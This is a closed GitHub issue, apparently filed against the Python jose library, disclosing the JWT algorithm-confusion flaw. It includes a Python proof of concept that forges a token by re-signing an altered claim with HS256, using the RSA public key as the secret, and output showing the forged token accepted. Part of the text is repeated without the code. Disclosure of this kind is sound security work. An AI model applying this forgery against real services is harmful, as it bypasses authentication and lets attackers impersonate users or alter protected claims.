Closed yuriikonovaliuk closed 8 years ago
There is a critical vulnerability in bunch of JWT implementation that recently discovered. See article here: https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ jose library is vulnerable as well. Here the example of implementation of the approach from article using jose library:
from Crypto.PublicKey import RSA from json import loads as json_decode, dumps as json_encode import jose private_key = RSA.generate(1024) public_key = private_key.publickey() def sign_token(claim, key, alg='RS256'): return jose.sign(claim, {'k': key}, alg=alg) def verify_token(jws, key): return jose.verify(jws, {'k': key}) if __name__ == '__main__': # Token issuer claim = {'resource': 'value'} jws = sign_token(claim, private_key.exportKey()) # Signed using RSA alg # serialization, transfer .... # Token forger forged_claim = json_decode(jose.b64decode_url(jws.payload)) forged_claim['resource'] = 'hacked_value' # signed using HMAC algorithm with RSA public key forged_jws = sign_token(forged_claim, public_key.exportKey(), alg='HS256') # Token verification print 'verifying valid token:' try: verify_token(jws, public_key.exportKey()) print 'success' except jose.Error: 'failed' print 'verifying forged token:' try: verify_token(forged_jws, public_key.exportKey()) print 'success' except jose.Error: 'failed'
The result of execution is following:
verifying valid token: success verifying forged token: success
Which means that anybody with public key can forge tokens that will pass the verification.
There is a critical vulnerability in bunch of JWT implementation that recently discovered. See article here: https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/ jose library is vulnerable as well. Here the example of implementation of the approach from article using jose library:
The result of execution is following:
Which means that anybody with public key can forge tokens that will pass the verification.